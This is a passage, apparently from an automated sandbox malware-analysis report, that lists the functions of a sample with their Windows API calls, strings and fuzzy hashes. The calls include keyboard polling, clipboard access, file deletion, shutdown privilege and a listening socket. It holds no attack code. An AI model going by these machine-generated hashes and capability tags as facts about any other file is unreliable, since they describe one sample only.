                                        • Instruction Fuzzy Hash: AAE13C31604214AFCB14DF28C895E6ABBE4FF89714F04856DF88ADB2A2DB34E905DB51
                                        Function 00EE0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00EE0241
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EE02C2
                                        • GetKeyState.USER32(000000A0), ref: 00EE02DD
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EE02F7
                                        • GetKeyState.USER32(000000A1), ref: 00EE030C
                                        • GetAsyncKeyState.USER32(00000011), ref: 00EE0324
                                        • GetKeyState.USER32(00000011), ref: 00EE0336
                                        • GetAsyncKeyState.USER32(00000012), ref: 00EE034E
                                        • GetKeyState.USER32(00000012), ref: 00EE0360
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EE0378
                                        • GetKeyState.USER32(0000005B), ref: 00EE038A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                                        • Instruction ID: cd5002eac4439d976467b8f996c4e8fb5c1577e3aeee3fc84e842701b64e6e13
                                        • Opcode Fuzzy Hash: 1fc7be96559c2c83fb1f18d56c14925d4a2f3898aff0712ba2ebfcaf3af233e5
                                        • Instruction Fuzzy Hash: D741EB246047CE6EFF318AA598083B5BFE07F16358F08509DD6C6665C3EBE459C887A2
                                        Function 00EF86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • CoInitialize.OLE32 ref: 00EF8718
                                        • CoUninitialize.COMBASE ref: 00EF8723
                                        • CoCreateInstance.COMBASE(?,00000000,00000017,00F12BEC,?), ref: 00EF8783
                                        • IIDFromString.COMBASE(?,?), ref: 00EF87F6
                                        • VariantInit.OLEAUT32(?), ref: 00EF8890
                                        • VariantClear.OLEAUT32(?), ref: 00EF88F1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                        • API String ID: 834269672-1287834457
                                        • Opcode ID: 9670dcfa4a4aee9ca631c8108e2493be445cebc685b3b9a5cd113bce66453ef0
                                        • Instruction ID: 18a478ec11c630515662bffe60ae04166ed01c36d1812186755fad2571f6542f
                                        • Opcode Fuzzy Hash: 9670dcfa4a4aee9ca631c8108e2493be445cebc685b3b9a5cd113bce66453ef0
                                        • Instruction Fuzzy Hash: DE61D3316083059FC714EF24CA44BABB7E4EF48754F54581EFA85AB291DB70ED48CB92
                                        Function 00EF4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                        • String ID:
                                        • API String ID: 1737998785-0
                                        • Opcode ID: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                                        • Instruction ID: b35b9333c9ec4a3a6078fc45112f91079567eed8118c29c02fd47c05a4ab3bb6
                                        • Opcode Fuzzy Hash: 0019352f1a8640eaddf3f53f84829fdb4a01ece843082ff568a3bbb31c36b547
                                        • Instruction Fuzzy Hash: 5621D3757002189FDB20AF60EC49B7A77A8FF44310F14806AF94AEB2A1CB71AD01DB84
                                        Function 00EE3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                          • Part of subcall function 00EE4CD3: GetFileAttributesW.KERNEL32(?,00EE3947), ref: 00EE4CD4
                                        • FindFirstFileW.KERNEL32(?,?), ref: 00EE3ADF
                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00EE3B87
                                        • MoveFileW.KERNEL32(?,?), ref: 00EE3B9A
                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00EE3BB7
                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EE3BD9
                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00EE3BF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                        • String ID: \*.*
                                        • API String ID: 4002782344-1173974218
                                        • Opcode ID: 03c936f42c9897c66d8af365fed89874f113fe5b649f5515eaf853289f22e756
                                        • Instruction ID: ae11ba7af1d8566074a8fceec67a6d1218091ceb27348e84b3055bf209127c01
                                        • Opcode Fuzzy Hash: 03c936f42c9897c66d8af365fed89874f113fe5b649f5515eaf853289f22e756
                                        • Instruction Fuzzy Hash: 1951803180118D9ACF15FBA1CD968EDB7F9AF14304F6461A9E44A77091EF31AF09CB60
                                        Function 00E94140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-3486589167
                                        • Opcode ID: f86505e0da4881dc52371483709485aa592b1cedd91bc6e175df11c5e8793cc3
                                        • Instruction ID: 3308973111c27fdcd1f664ef7c8b95fac6bd0280303e2f4d3fdc9f6625b59e15
                                        • Opcode Fuzzy Hash: f86505e0da4881dc52371483709485aa592b1cedd91bc6e175df11c5e8793cc3
                                        • Instruction Fuzzy Hash: 82A260B1E0421ACBDF24CF58CA90BEDB7B1BB54318F1491AAD856B7280D7719E82DF50
                                        Function 00EEF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00EEF6AB
                                        • Sleep.KERNEL32(0000000A), ref: 00EEF6DB
                                        • _wcscmp.LIBCMT ref: 00EEF6EF
                                        • _wcscmp.LIBCMT ref: 00EEF70A
                                        • FindNextFileW.KERNEL32(?,?), ref: 00EEF7A8
                                        • FindClose.KERNEL32(00000000), ref: 00EEF7BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                        • String ID: *.*
                                        • API String ID: 713712311-438819550
                                        • Opcode ID: 3785e304427d3ae45d5d2958cc13d314c2d81dd59e3d238e249dbc718ee54943
                                        • Instruction ID: 7aa4757ab95f9abd754a1586b545cb53b3faf5efd3b72e14059bd29cede156cc
                                        • Opcode Fuzzy Hash: 3785e304427d3ae45d5d2958cc13d314c2d81dd59e3d238e249dbc718ee54943
                                        • Instruction Fuzzy Hash: 8941907191024E9FCF21EF65CC85AEEBBB4FF05314F145566E819B21A0EB309E44CB90
                                        Function 00F0D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                        • GetSystemMetrics.USER32(0000000F), ref: 00F0D78A
                                        • GetSystemMetrics.USER32(0000000F), ref: 00F0D7AA
                                        • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00F0D9E5
                                        • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F0DA03
                                        • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F0DA24
                                        • ShowWindow.USER32(00000003,00000000), ref: 00F0DA43
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00F0DA68
                                        • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 00F0DA8B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                        • String ID:
                                        • API String ID: 830902736-0
                                        • Opcode ID: 0f2e7206e5fca17429a2d062afe1937aeb6a55732de49af6d9d50f5568b3f094
                                        • Instruction ID: 51639e4566f729c2a027cc1b446f715b02dd0115b0e01ae80c319afbba017f78
                                        • Opcode Fuzzy Hash: 0f2e7206e5fca17429a2d062afe1937aeb6a55732de49af6d9d50f5568b3f094
                                        • Instruction Fuzzy Hash: 63B19A75A00229EFDF14CFA8C9857BE7BB1FF44711F088069EC489B296D734A950EB50
                                        Function 00EDEB07 Relevance: 11.1, APIs: 1, Strings: 6, Instructions: 561stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00EDEB19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                        • API String ID: 1659193697-2318614619
                                        • Opcode ID: 1460abaf4b77bef9295a75e22f83f500f2fe302895e2286b0a321aba434a1c84
                                        • Instruction ID: 2cc4d626cbd1ff49bf5ecb817adbf18b96876471cbe230e66dd6d722dd2b69c9
                                        • Opcode Fuzzy Hash: 1460abaf4b77bef9295a75e22f83f500f2fe302895e2286b0a321aba434a1c84
                                        • Instruction Fuzzy Hash: A0323675A007059FC728DF19C485AAAB7F1FF48320B15D56EE89AEB3A1D770E942CB40
                                        Function 00E958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 9d645d9095eecd6a655e023978844de5f15ee8e55098361815282c49c88218ad
                                        • Instruction ID: 846295bf83007c9bba8f6abfd9f0893a974e748492d86db98fd4f5e599d7fd5a
                                        • Opcode Fuzzy Hash: 9d645d9095eecd6a655e023978844de5f15ee8e55098361815282c49c88218ad
                                        • Instruction Fuzzy Hash: 42128971A00609EFDF14DFA4D981AEEB3F5FF48300F14956AE84AB7291EB35A911CB50
                                        Function 00E95680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA0FF6: std::exception::exception.LIBCMT ref: 00EA102C
                                          • Part of subcall function 00EA0FF6: __CxxThrowException@8.LIBCMT ref: 00EA1041
                                        • _memmove.LIBCMT ref: 00ED062F
                                        • _memmove.LIBCMT ref: 00ED0744
                                        • _memmove.LIBCMT ref: 00ED07EB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                        • String ID: yZ
                                        • API String ID: 1300846289-3798167742
                                        • Opcode ID: 1c092f66e7fad43ead9fa4f58b89ff99af158b2c1368e17fcd47e8c32996dd7e
                                        • Instruction ID: 0399b62fc9b5958d6d6cb70f0d2705b11e2f8a21d53ee3d3e90e6646d7676d6a
                                        • Opcode Fuzzy Hash: 1c092f66e7fad43ead9fa4f58b89ff99af158b2c1368e17fcd47e8c32996dd7e
                                        • Instruction Fuzzy Hash: 63027071A00209DBDF15DF64D9816AE7BF5EF44300F1490AAE80AEB355EB31DA51CB91
                                        Function 00F0C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                                          • Part of subcall function 00E82344: GetCursorPos.USER32(?), ref: 00E82357
                                          • Part of subcall function 00E82344: ScreenToClient.USER32(00F467B0,?), ref: 00E82374
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000001), ref: 00E82399
                                          • Part of subcall function 00E82344: GetAsyncKeyState.USER32(00000002), ref: 00E823A7
                                        • ReleaseCapture.USER32 ref: 00F0C2F0
                                        • SetWindowTextW.USER32(?,00000000), ref: 00F0C39A
                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00F0C3AD
                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00F0C48F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                        • API String ID: 973565025-2107944366
                                        • Opcode ID: f0fdf4825f17525dd1f5c02b6d077dc1a74ab5a259b08df7d49041d39ab556cb
                                        • Instruction ID: 782e2b259bb9726649a1adea7b9ff8f4f69f0cbe12c0de930b767c448534f95e
                                        • Opcode Fuzzy Hash: f0fdf4825f17525dd1f5c02b6d077dc1a74ab5a259b08df7d49041d39ab556cb
                                        • Instruction Fuzzy Hash: E3519A74604304AFD714EF20CC95F6A7BE0FB89310F00462DF9999B2E2CB70A949EB52
                                        Function 00EE545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                                          • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                                          • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                                        • ExitWindowsEx.USER32(?,00000000), ref: 00EE549B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                        • String ID: $@$SeShutdownPrivilege
                                        • API String ID: 2234035333-194228
                                        • Opcode ID: 299ec666146cc0e2e962d780dc00511f8629678adc3513d3a77ccc0ceb307ddd
                                        • Instruction ID: d82d90393b85d6e96d08e0aab0602027ccb748e40f52524d618451aae6817b0e
                                        • Opcode Fuzzy Hash: 299ec666146cc0e2e962d780dc00511f8629678adc3513d3a77ccc0ceb307ddd
                                        • Instruction Fuzzy Hash: 1F014733654A5D6AF7385276DC4ABBA7258EB0175AF242022FC27F20C3EA500C808291
                                        Function 00E93190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: __itow__swprintf
                                        • String ID: Oa
                                        • API String ID: 674341424-3945284152
                                        • Opcode ID: 4217e7f167d55b946cdb3307107dcecd22857d1f1624ec7bd4ed0f1ace1860ef
                                        • Instruction ID: b86bb3de36ce5fe042220aefe44d7892c1b86414217fa233baf41e40105fdcf1
                                        • Opcode Fuzzy Hash: 4217e7f167d55b946cdb3307107dcecd22857d1f1624ec7bd4ed0f1ace1860ef
                                        • Instruction Fuzzy Hash: 59229E715083019FCB24DF24C881BAFB7E5AF88704F14591DF89AA7292DB71EE05CB92
                                        Function 00EF6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(00000002,00000001,00000006), ref: 00EF65EF
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF65FE
                                        • bind.WS2_32(00000000,?,00000010), ref: 00EF661A
                                        • listen.WS2_32(00000000,00000005), ref: 00EF6629
                                        • WSAGetLastError.WS2_32(00000000), ref: 00EF6643
                                        • closesocket.WS2_32(00000000), ref: 00EF6657
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
